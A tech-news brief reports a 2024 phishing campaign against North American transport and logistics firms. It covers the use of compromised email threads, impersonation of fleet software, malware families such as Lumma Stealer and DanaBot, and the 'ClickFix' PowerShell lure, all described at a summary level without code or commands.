Curated Content | Thought Leadership | Technology News

New Phishing Campaign Targets North American Transport and Logistics Firms

Compromised cargo.
Ryan Uliss
Contributing Writer
Aerial footage of cargo ship with colorful shipping containers.

Researchers are tracking a concerning malware campaign targeting transportation and logistics companies across North America. The threat actors behind the campaign use compromised legitimate email accounts to inject malicious content into ongoing email conversations, making the attacks appear more credible.

This campaign, which has been active since May 2024, involves a variety of malware payloads, including Lumma Stealer, StealC, and DanaBot. In recent months, the attackers have adapted their methods, employing new infrastructure and techniques such as “ClickFix” to deliver malware via Base64-encoded PowerShell scripts.

At this time, researchers are still unclear how the attackers were able to gain initial access to the compromised email accounts.

By impersonating industry-specific software like Samsara and Astra TMS, the attackers craft phishing emails that not only mimic the language and workflows common in the shipping and logistics sector but also suggest they conduct thorough research into their targets before launching their campaigns, significantly increasing the chances of a successful breach.

Why It Matters: Cybercriminals are refining their social engineering tactics to blend malicious activity seamlessly into real email conversations, increasing the risk of malware infection. By targeting transportation and logistics companies and impersonating specialized software, this campaign showcases a strategic focus on sectors crucial to supply chains and critical infrastructure. Organizations in these industries need to remain vigilant to avoid falling victim to increasingly sophisticated phishing tactics.

  • Compromised Legitimate Accounts: The threat actors use compromised email accounts from transportation companies, injecting malicious content into existing conversations, making it harder for victims to detect the threat.
  • Variety of Malware: From May to July 2024, the campaign delivered Lumma Stealer, StealC, and DanaBot. In August 2024, the attackers introduced the “ClickFix” technique, where victims are led through dialogue boxes to copy and paste a PowerShell script that downloads malware.
  • Targeted Sector: The campaign focuses on North American transport and logistics companies, impersonating software like Samsara and Astra TMS, which are commonly used in fleet management.
  • Financially Motivated: Researchers assess that these attacks are likely financially driven, though the actors remain unidentified. The use of commodity malware like DanaBot and third-party infrastructure points to involvement in the broader cybercriminal ecosystem, relying on widely available tools rather than custom malware.

Go Deeper -> Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware – Proofpoint

Transportation Companies Hit by Cyberattacks Using Lumma Stealer and NetSupport Malware – The Hacker News

☀️ Subscribe to the Early Morning Byte! Begin your day informed, engaged, and ready to lead with the latest in technology news and thought leadership.

☀️ Your latest edition of the Early Morning Byte is here! Kickstart your day informed, engaged, and ready to lead with the latest in technology news and thought leadership.

ADVERTISEMENT

×
You have free article(s) left this month courtesy of CIO Partners.

Enter your username and password to access premium features.

Don’t have an account? Join the community.

Would You Like To Save Articles?

Enter your username and password to access premium features.

Don’t have an account? Join the community.

Thanks for subscribing!

We’re excited to have you on board. Stay tuned for the latest technology news delivered straight to your inbox.

Save My Spot For TNCR LIVE!

Thursday April 18th

9 AM Pacific / 11 PM Central / 12 PM Eastern

Register for Unlimited Access

Already a member?

Digital Monthly

$12.00/ month

Billed Monthly

Digital Annual

$10.00/ month

Billed Annually

Would You Like To Save Books?

Enter your username and password to access premium features.

Don’t have an account? Join the community.

Log In To Access Premium Features

Sign Up For A Free Account

Please enable JavaScript in your browser to complete this form.
Name
Newsletters